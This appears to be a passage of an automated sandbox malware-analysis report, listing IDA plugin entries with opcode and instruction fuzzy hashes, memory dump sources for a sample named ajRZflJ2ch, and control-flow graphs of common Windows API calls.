                                                                                                            • Opcode Fuzzy Hash: f6884e25b09e4463b9824958e1fe9e90931cf9ccf122bdf36248c18acab4c2a2
                                                                                                            • Instruction Fuzzy Hash: 34A180B5E056188FEB18CF6AC944B9DBBF2AF89300F14C1AAD40DA7251DB745A85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: 5ae0c6397420b227e304f091edad119756618953418c303eecccb28b7a76ed48
                                                                                                            • Instruction ID: b5c1df5d34e1f1ca20e33146d4c61c6a5167a59462a951f4baa72a38a6ff6c06
                                                                                                            • Opcode Fuzzy Hash: 5ae0c6397420b227e304f091edad119756618953418c303eecccb28b7a76ed48
                                                                                                            • Instruction Fuzzy Hash: 7BA192B5E052188FEB24CF6AC944B9DBBF6BF89300F14C1AAD409B7255DB345A85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: 070700dfc04cd90a7ed5df9fba49f5dfcc4ec04578e7d456af8fa9c3a90f9a7d
                                                                                                            • Instruction ID: 0a22b2070018ab6a1179e31abc42d1f2e4f1f1cd83808377b4a2947b12565c18
                                                                                                            • Opcode Fuzzy Hash: 070700dfc04cd90a7ed5df9fba49f5dfcc4ec04578e7d456af8fa9c3a90f9a7d
                                                                                                            • Instruction Fuzzy Hash: ECA190B5E052188FEB24CF6AC944B9DFBF2BB89300F14C1AAD809A7255DB345A85CF51
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: 0adf23c5482d7e9472f34e1350abefa6788f6bf30f892ad6f84246d2a82d78d1
                                                                                                            • Instruction ID: e3c610284d64414c3cab61a1cd3ddf452aef9d14cfdc220e78131aef0ae181f1
                                                                                                            • Opcode Fuzzy Hash: 0adf23c5482d7e9472f34e1350abefa6788f6bf30f892ad6f84246d2a82d78d1
                                                                                                            • Instruction Fuzzy Hash: 6C7195B5E016188FEB58CF6AC944B9EBBF2AF89300F14C1EAD40DA7255DB345A85CF50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0^8
                                                                                                            • API String ID: 0-200038284
                                                                                                            • Opcode ID: f0be8d9d4b909d1f74cc0bcf4cb91d7cd476f44220643efac4a8dbab98d73c10
                                                                                                            • Instruction ID: 650f37cd185fc3ba319de5d8d89d5488f122bbe3ed64c8c4c2c8260c6bde01d2
                                                                                                            • Opcode Fuzzy Hash: f0be8d9d4b909d1f74cc0bcf4cb91d7cd476f44220643efac4a8dbab98d73c10
                                                                                                            • Instruction Fuzzy Hash: 7F71B5B5E046188FEB58CF6AC944B9DFBF2AF89300F14C1AAD40DA7254DB345A85CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: eb583ae401fd1c734da7fbeacad7455c97eabe1f2bd8cf45c6417d65eab7d6b5
                                                                                                            • Instruction ID: 6914336cfad21af47dedeabc93d8e9bdd0e900ee3ce77d849b6b717a9efc2623
                                                                                                            • Opcode Fuzzy Hash: eb583ae401fd1c734da7fbeacad7455c97eabe1f2bd8cf45c6417d65eab7d6b5
                                                                                                            • Instruction Fuzzy Hash: 09A24C71A04309DFCB15CFA8C894AAEBBF2BF89310F15856AE4059B361D735ED41CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7738f83dbb17ca689d88d276c55b28ae925651b24abf42a072bd8a703eb6ac8e
                                                                                                            • Instruction ID: 8476aca1af336bdc385149022df082425ba9ee86b8e1fe2543f501aeae14a288
                                                                                                            • Opcode Fuzzy Hash: 7738f83dbb17ca689d88d276c55b28ae925651b24abf42a072bd8a703eb6ac8e
                                                                                                            • Instruction Fuzzy Hash: 6282C374A40268CFDB25DF64C895B99BBB2FF89301F5080E9D80AA7351DB359E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c5a4143dff6a5abd44255df49d894c4bbea7d304a3c84e56ae82c2a97cb5482f
                                                                                                            • Instruction ID: a7f6ccbea145fe4a47b39f4203e8893f944e0072b47349f13a9e3d20cd7d9b48
                                                                                                            • Opcode Fuzzy Hash: c5a4143dff6a5abd44255df49d894c4bbea7d304a3c84e56ae82c2a97cb5482f
                                                                                                            • Instruction Fuzzy Hash: 9E72D374A01258CFDB25DF68C895B99BBB2FF89701F5081E9D80AA7350CB359E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c4f4579590cce6f7fcad80a65691c4a53e5096c07fc0bfadc9781b07a901dfcf
                                                                                                            • Instruction ID: 1e4c1b709c77ccd20183e6a44a2749d916702a8dd12d016a0bde810850c94c76
                                                                                                            • Opcode Fuzzy Hash: c4f4579590cce6f7fcad80a65691c4a53e5096c07fc0bfadc9781b07a901dfcf
                                                                                                            • Instruction Fuzzy Hash: CE72CF74E052698FEB64DF69C984BDDBBB2BB49300F5082E9D809A7351DB349E81CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c2d8f0ea093bf0938a5dbad0dc9f7b942391d6a14f16a80e4c41dbd93f54d53f
                                                                                                            • Instruction ID: f542fea8dc8747180febff409ae73eadf10fb834ee54be441be31ac9e1d032a3
                                                                                                            • Opcode Fuzzy Hash: c2d8f0ea093bf0938a5dbad0dc9f7b942391d6a14f16a80e4c41dbd93f54d53f
                                                                                                            • Instruction Fuzzy Hash: A0123C30A00219DFDB54CFA9C994AAEBBF2BF89314F15806AE405AB361D736DD41DB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04e5118545b08439a37739f4986046387520f81faf08457a952c88d2c6d79a2f
                                                                                                            • Instruction ID: 089116063225b44dd0733e951574d9d2bc800486feaadc8abcdfd01b10b222e3
                                                                                                            • Opcode Fuzzy Hash: 04e5118545b08439a37739f4986046387520f81faf08457a952c88d2c6d79a2f
                                                                                                            • Instruction Fuzzy Hash: 0EE1C374E01218CFEB14CFA9C994B9DBBB2BF89304F1081A9D809BB391DB755A85DF11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2922050151e0c9bf3dfec538151af9e5f6d493f5687280e99b0e0fc34984fea0
                                                                                                            • Instruction ID: 769b5c8dc80d393d118830d7ad8f7837a807a08d30285473bfc1526f52992b56
                                                                                                            • Opcode Fuzzy Hash: 2922050151e0c9bf3dfec538151af9e5f6d493f5687280e99b0e0fc34984fea0
                                                                                                            • Instruction Fuzzy Hash: 43D1A374E00318CFDB14DFA9C994B9DBBB2BF89301F1080A9D809AB365DB355A85DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 89a1b2a77bcee659827da29d599b1e084047461afcfc95833377a901b5a9688f
                                                                                                            • Instruction ID: a2027ccc73c3a8b0a6d7cdbce154763d4af16547675e70d1df7959dbe9f49025
                                                                                                            • Opcode Fuzzy Hash: 89a1b2a77bcee659827da29d599b1e084047461afcfc95833377a901b5a9688f
                                                                                                            • Instruction Fuzzy Hash: 3CA1E574D00208CFEB14DFA9C994BDDBBB1FF89314F208269E408AB2A1DB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 83001d6ad28adfa1ca96e99a92012f0d4a79657155d7a5752d1d4b9d4a9dbb84
                                                                                                            • Instruction ID: 6e2632435d54593725e4ddb17f1f48e6a6bee2302e21ac04de5b211da07f10dd
                                                                                                            • Opcode Fuzzy Hash: 83001d6ad28adfa1ca96e99a92012f0d4a79657155d7a5752d1d4b9d4a9dbb84
                                                                                                            • Instruction Fuzzy Hash: B7A1E474D00208CFEB14DFA9C954BDDBBB1FF89314F208269E408AB2A1DB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2734067728.0000000036AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AF0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_36af0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 432894c6ea44f039f624780862664a2f667e4976024dfaa9f3982f9dbeabfd6d
                                                                                                            • Instruction ID: ac2297a7037bb63bc08f4163cbcb7743f06febf470daa40bcc314966f89ab943
                                                                                                            • Opcode Fuzzy Hash: 432894c6ea44f039f624780862664a2f667e4976024dfaa9f3982f9dbeabfd6d
                                                                                                            • Instruction Fuzzy Hash: 8A91E274D00318CFEB10DFA9C994B9CBBB1FF49314F208269E809AB2A1DB759985CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2707091571.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_d0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0dc985d08dd9870f1c6ce239703ce64832e4f4c431b35b2dac99e6819fae04d
                                                                                                            • Instruction ID: 1dba7338ab27be9a505ef91e184b2b34a627c9943b5e5f0d2c86a885ceaa185d
                                                                                                            • Opcode Fuzzy Hash: a0dc985d08dd9870f1c6ce239703ce64832e4f4c431b35b2dac99e6819fae04d
                                                                                                            • Instruction Fuzzy Hash: 2591D574E00358CFEB54DFA9D884A9DBBF2BF89300F14816AE409AB365DB349985CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3152b3f906113a563e11d866fd25e44e6318cc2c2ec72de6ecbfccd01f830bd9
                                                                                                            • Instruction ID: 088f620843d76e2ffbddd65098de81a1923576aba41c007cd28687e0e6e30b7c
                                                                                                            • Opcode Fuzzy Hash: 3152b3f906113a563e11d866fd25e44e6318cc2c2ec72de6ecbfccd01f830bd9
                                                                                                            • Instruction Fuzzy Hash: 7C81C574E04249CFEB14DFAAC94469DBBF2FF88710F248229D858AB359DB359942CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 21a4f5c40c81a15b1ade55756ba9d87bfd5e84b0b6b9e1dcd7570bcf43ec20cc
                                                                                                            • Instruction ID: 30eb953d89e66f86d0f6b22281c3a43fef2f995760a8675af203932b310f32d8
                                                                                                            • Opcode Fuzzy Hash: 21a4f5c40c81a15b1ade55756ba9d87bfd5e84b0b6b9e1dcd7570bcf43ec20cc
                                                                                                            • Instruction Fuzzy Hash: 6581C474E04249CBEB14DFAAC95469DBBF2FF88710F248229D818BB395DB359942CB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d908f4cc3f2436f3292cbed4e45ec2f53744c6774895b7a00ac7a6b37c489cc7
                                                                                                            • Instruction ID: 5bf98bbc6444946a9dfd61fed08d9586b77a11c8f118ca9d80acbd76370134fc
                                                                                                            • Opcode Fuzzy Hash: d908f4cc3f2436f3292cbed4e45ec2f53744c6774895b7a00ac7a6b37c489cc7
                                                                                                            • Instruction Fuzzy Hash: D071B475E05268CFDB64DF6AC9807DDBBF2BF89301F1491AAD409A7250DB349A82CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2204e4dea262259f9c105ca8a81f3a8bce0a04943378d555e3e3a0bd1581ec2d
                                                                                                            • Instruction ID: 94e1cc15013054a77ff91f4b701fb3815e5915aa543e5f977bed2fe62849ef89
                                                                                                            • Opcode Fuzzy Hash: 2204e4dea262259f9c105ca8a81f3a8bce0a04943378d555e3e3a0bd1581ec2d
                                                                                                            • Instruction Fuzzy Hash: 72611734A40259CFEB25DF68C955BADFBB2FF88700F1080A9980A67750DB355E82EF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5048258d1d6facae65a0933f951d4978945be721f72c163cf1221c65dc4c01e
                                                                                                            • Instruction ID: 7fea9c2dcca3ed37befe7becd5204c96b6239c135d0cee2c8d820ad3622695f6
                                                                                                            • Opcode Fuzzy Hash: d5048258d1d6facae65a0933f951d4978945be721f72c163cf1221c65dc4c01e
                                                                                                            • Instruction Fuzzy Hash: E1415AB1D056188FEB58CF6BC9457D9FAF3AFC9300F14C1AAC40CA6264DB740A858F50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a2956d5b40297912df8b0e9e77b6c8ecce31b6a2cef77c6fb23c73f995b832bc
                                                                                                            • Instruction ID: 937cd1873f4f5377e0439e30d59806afc1fa1b90cc0cea1283a170643aca95ab
                                                                                                            • Opcode Fuzzy Hash: a2956d5b40297912df8b0e9e77b6c8ecce31b6a2cef77c6fb23c73f995b832bc
                                                                                                            • Instruction Fuzzy Hash: 154148B5D016188BEB58CF6BCD5578AFAF3AFC9310F04C1BAD50CA6264DB740A858F51

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 113 39eb0970-39eb0a0f GetCurrentProcess 117 39eb0a18-39eb0a4c GetCurrentThread 113->117 118 39eb0a11-39eb0a17 113->118 119 39eb0a4e-39eb0a54 117->119 120 39eb0a55-39eb0a89 GetCurrentProcess 117->120 118->117 119->120 122 39eb0a8b-39eb0a91 120->122 123 39eb0a92-39eb0aaa 120->123 122->123 134 39eb0aad call 39eb0b4f 123->134 135 39eb0aad call 39eb0f31 123->135 126 39eb0ab3-39eb0ae2 GetCurrentThreadId 127 39eb0aeb-39eb0b4d 126->127 128 39eb0ae4-39eb0aea 126->128 128->127 134->126 135->126
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 39EB09FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 39EB0A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 39EB0A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 39EB0AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 16b662aeb96bd09ce5f82f995a50d34823117fafebb2a9e9513b6ca0eda01ca3
                                                                                                            • Instruction ID: 50888370738281ec782bb56ecd2382384c32a18adcb9f07429f2d795a65554fc
                                                                                                            • Opcode Fuzzy Hash: 16b662aeb96bd09ce5f82f995a50d34823117fafebb2a9e9513b6ca0eda01ca3
                                                                                                            • Instruction Fuzzy Hash: 375167B0D0434A8FDB04DFAAC544BDEBBF1BF88311F21845AD458A7261D735A940CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 136 39eb0980-39eb0a0f GetCurrentProcess 140 39eb0a18-39eb0a4c GetCurrentThread 136->140 141 39eb0a11-39eb0a17 136->141 142 39eb0a4e-39eb0a54 140->142 143 39eb0a55-39eb0a89 GetCurrentProcess 140->143 141->140 142->143 145 39eb0a8b-39eb0a91 143->145 146 39eb0a92-39eb0aaa 143->146 145->146 157 39eb0aad call 39eb0b4f 146->157 158 39eb0aad call 39eb0f31 146->158 149 39eb0ab3-39eb0ae2 GetCurrentThreadId 150 39eb0aeb-39eb0b4d 149->150 151 39eb0ae4-39eb0aea 149->151 151->150 157->149 158->149
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 39EB09FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 39EB0A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 39EB0A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 39EB0AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39eb0000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: eb8b849f2e3401fe22de9a3f0b217cf4d3c43129a22d508e08b1ac29d7a0f6e6
                                                                                                            • Instruction ID: c193475ced5fbde189ea60009eb6a07ae468e8943f6fac93f80d456854071559
                                                                                                            • Opcode Fuzzy Hash: eb8b849f2e3401fe22de9a3f0b217cf4d3c43129a22d508e08b1ac29d7a0f6e6
                                                                                                            • Instruction Fuzzy Hash: 565134B090430A8FDB04DFAAC545B9EBBF1BF88311F208469E419A72A1DB75A940CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 820 39a87920-39a87941 821 39a87948-39a8797e 820->821 822 39a87943 820->822 825 39a87987-39a879ae 821->825 822->821 827 39a87b3d-39a87b46 825->827 828 39a879b4-39a879cc 825->828 831 39a87ae8-39a87b03 828->831 833 39a87b09-39a87b2d 831->833 834 39a879d1-39a87ae7 831->834 833->827 834->831
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <C8$<C8$<C8
                                                                                                            • API String ID: 0-3515760634
                                                                                                            • Opcode ID: b80bfe23a1162f483702265df4590bc2219410a790cab734b3b787da47fefbe2
                                                                                                            • Instruction ID: 40d24c55c24a119106aec0f5041719a6747f522a772f422ac8bd0258757e0b77
                                                                                                            • Opcode Fuzzy Hash: b80bfe23a1162f483702265df4590bc2219410a790cab734b3b787da47fefbe2
                                                                                                            • Instruction Fuzzy Hash: 5C51E174E01318CFEB14DFA9C898AADBBB2FF88705F608129D805AB254DB355A46DF40

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 965 39a8fab0-39a8fafe 970 39a8fb00-39a8fb13 965->970 971 39a8fb15-39a8fb1d 965->971 970->971 975 39a8fb24-39a8fb56 call 39a8ebfc 970->975 971->975 1022 39a8fb58 call 36aff4e8 975->1022 1023 39a8fb58 call 36aff4a1 975->1023 981 39a8fb5e-39a8fb88 984 39a8fb8a-39a8fb9d 981->984 985 39a8fba2-39a8fbdb call 39a8ec0c 981->985 986 39a8fdd9-39a8fddf 984->986 995 39a8fbdd-39a8fbec 985->995 996 39a8fc10-39a8fcd9 985->996 987 39a8fde9 986->987 988 39a8fde1 986->988 990 39a8fdea 987->990 988->987 990->990 995->996 999 39a8fbee-39a8fc08 995->999 1017 39a8fcdc call 39eb001c 996->1017 1018 39a8fcdc call 39eb0012 996->1018 1019 39a8fcdc call 39eb0021 996->1019 1020 39a8fcdc call 39eb00c0 996->1020 1021 39a8fcdc call 39eb0006 996->1021 999->996 1012 39a8fce2-39a8fd3c 1015 39a8fd3e 1012->1015 1016 39a8fd47 1012->1016 1015->1016 1016->986 1017->1012 1018->1012 1019->1012 1020->1012 1021->1012 1022->981 1023->981
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $X64X6DX6TX6dX6tX6$g8
                                                                                                            • API String ID: 0-1359129848
                                                                                                            • Opcode ID: b0232815adce64237326d0f8cd1a77b098407c8c7cfcd61359ad1d37a1020260
                                                                                                            • Instruction ID: ccd050e1fb56905db11fc5bd62dea533842cf77603b923f15a8f142ca29cb7b4
                                                                                                            • Opcode Fuzzy Hash: b0232815adce64237326d0f8cd1a77b098407c8c7cfcd61359ad1d37a1020260
                                                                                                            • Instruction Fuzzy Hash: EC710975E00219CFDB15DFB5C9589ADBFB6FF89B05F21812AD806AB250DB349942CF80

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1075 39a87913-39a87941 1076 39a87948-39a8797e 1075->1076 1077 39a87943 1075->1077 1080 39a87987-39a879ae 1076->1080 1077->1076 1082 39a87b3d-39a87b46 1080->1082 1083 39a879b4-39a879cc 1080->1083 1086 39a87ae8-39a87b03 1083->1086 1088 39a87b09-39a87b2d 1086->1088 1089 39a879d1-39a87ae7 1086->1089 1088->1082 1089->1086
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736064050.0000000039A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A80000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_39a80000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <C8$<C8
                                                                                                            • API String ID: 0-2669143913
                                                                                                            • Opcode ID: d73bdaedbf456be621f42e94251d4325246524ec3c45342e6b558fa2757ed57f
                                                                                                            • Instruction ID: 246d756f339b64ef5f84afbe6ebb9aaa880f7db52aad7c198084ce130c02c49f
                                                                                                            • Opcode Fuzzy Hash: d73bdaedbf456be621f42e94251d4325246524ec3c45342e6b558fa2757ed57f
                                                                                                            • Instruction Fuzzy Hash: 0D310371D05328DEEB10CFA9D8487DEBBB2BF89305F50852AD805BB250DB75564ACF50

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1107 39eb0104-39eb0176 1108 39eb0178-39eb017e 1107->1108 1109 39eb0181-39eb0188 1107->1109 1108->1109 1110 39eb018a-39eb0190 1109->1110 1111 39eb0193-39eb0232 CreateWindowExW 1109->1111 1110->1111 1113 39eb023b-39eb0273 1111->1113 1114 39eb0234-39eb023a 1111->1114 1118 39eb0280 1113->1118 1119 39eb0275-39eb0278 1113->1119 1114->1113 1120 39eb0281 1118->1120 1119->1118 1120->1120
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39EB0222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2736229094.0000000039EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EB0000, based on PE: false
